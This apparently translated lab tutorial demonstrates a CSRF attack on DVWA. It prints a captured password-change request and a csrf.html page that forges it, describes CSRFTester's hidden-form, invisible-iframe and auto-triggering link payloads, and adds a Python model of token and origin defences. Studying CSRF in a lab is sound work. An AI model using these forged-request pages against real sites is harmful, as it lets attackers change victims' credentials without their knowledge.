
CSRF vulnerability test case

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >


Shulou(Shulou.com)06/01 Report--

The CSRF attack process is:

the attacker discovers a CSRF vulnerability -> constructs the code -> sends it to the victim -> the victim opens it -> the victim's browser executes the code -> the attack completes

Conditions for success:

The administrator is logged in to the site's back end, or the administrator's session has not yet expired.

Test the website:

The DVWA application in the OWASP BWA (owaspbwa) environment

The test content is the CSRF vulnerability.

As shown in the figure:

The HTTP request to change the login password is as follows:

GET /dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change HTTP/1.1
Host: 192.168.232.132
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2984.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://192.168.232.132/dvwa/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: security=low; PHPSESSID=3i35050qluj2hvvqu9rk760o81; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada

Nginx test

Build an nginx environment locally, forge the HTTP request above, submit it, and the DVWA login password on 192.168.232.132 is changed directly!

Create a csrf.html file as follows (the page title, body text and link text are the file's visible content; the link target is the password-change request shown above):

    <html>
    <head><title>Csrf vulnerability testing</title></head>
    <body>
    <p>This is a CSRF test.</p>
    <a href="https://192.168.232.132/dvwa/vulnerabilities/csrf/?password_new=admin&amp;password_conf=admin&amp;Change=Change">Click here</a>
    </body>
    </html>

Open csrf.html, as shown in the figure.

Click the hyperlink: the request is sent successfully and DVWA's login password is changed, as shown in the figure:

Log in to the back end directly with the modified password!
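To show why this works at the "low" level and what stops it, here is an added Python model of the change-password handler (example code, not DVWA's own): it accepts the forged GET when only the session cookie is checked, and rejects it once the handler requires POST, an Origin/Referer matching its own host, and a synchronizer token bound to the session. The server secret, the user_token field name and the two sample requests are assumptions constructed for this example.

```python
# Added example (not DVWA's code): the change-password handler modelled with and without
# CSRF defences. SECRET and the user_token field name are assumptions, not DVWA's.
import hashlib, hmac
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit
SECRET = b"constructed-server-side-secret"
def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, query dict, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in header_lines)}
    return method, parse_qs(target.partition("?")[2]), headers, body

def issue_token(session_id):
    """Synchronizer token bound to the session (an HMAC, so nothing is stored)."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def change_password(raw, protect):
    """Return 'changed' or a rejection reason. protect=False mirrors DVWA 'low',
    where the cookie the browser attaches automatically is the only check."""
    method, query, headers, body = parse_request(raw)
    cookies = SimpleCookie(headers.get("cookie", ""))
    if "PHPSESSID" not in cookies:
        return "rejected: not logged in"
    params = query if method == "GET" else parse_qs(body)
    new, conf = params.get("password_new"), params.get("password_conf")
    if not new or new != conf:
        return "rejected: passwords missing or differ"
    if not protect:
        return "changed"
    if method != "POST":
        return "rejected: state change must use POST"
    source = headers.get("origin") or headers.get("referer") or ""  # source check
    if urlsplit(source).netloc != headers.get("host"):
        return "rejected: cross-site request"
    token = params.get("user_token", [""])[0]  # token check, tied to the session
    if not hmac.compare_digest(token, issue_token(cookies["PHPSESSID"].value)):
        return "rejected: missing or invalid CSRF token"
    return "changed"
# Constructed requests: forged GET from the local csrf.html; legitimate POST with the token.
FORGED = ("GET /dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change"
          " HTTP/1.1\r\nHost: 192.168.232.132\r\nReferer: http://localhost/csrf.html\r\n"
          "Cookie: security=low; PHPSESSID=3i35050qluj2hvvqu9rk760o81\r\n\r\n")
def legit_request(token):
    return ("POST /dvwa/vulnerabilities/csrf/ HTTP/1.1\r\nHost: 192.168.232.132\r\n"
            "Origin: https://192.168.232.132\r\nCookie: security=high; PHPSESSID=3i35050qluj2hvvqu9rk760o81"
            f"\r\n\r\npassword_new=admin&password_conf=admin&Change=Change&user_token={token}")
```

Running change_password(FORGED, protect=False) returns "changed", while with protect=True the same forged request is rejected at the first check and only the POST that carries issue_token(session) from the same origin goes through.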

Tool: OWASP-CSRFTester-1.0.jar, which can automatically generate attack files with different contents.

Set the browser to use the tool as its proxy on port 8008; the tool captures the request, checks whether it carries a token, and you then start using it.

The Report Type option in the tool lets you choose which method to use for the attack:

Forms: creates a form whose fields are hidden and invisible to the user (POST, GET)

iFrame: creates an iframe with height and width 0, invisible to the user (POST, GET)

IMG: creates an IMG tag (GET only)

XHR: creates an AJAX request (POST, GET)

Link: creates a hyperlink with an <a> tag (GET only)

You can usually use the first one.

The second is easy to spot (not recommended if you are a novice and not familiar with JavaScript).

The third can only send GET requests, which is limiting.

The fourth is subject to the cross-domain restriction: browsers do not allow cross-domain requests unless the site is configured to permit them.

The fifth needs a click to trigger it (it can of course be changed to trigger automatically), and it too can only send GET requests.

This test was done entirely in a local environment; any resemblance to a real site is coincidental!

That's it!
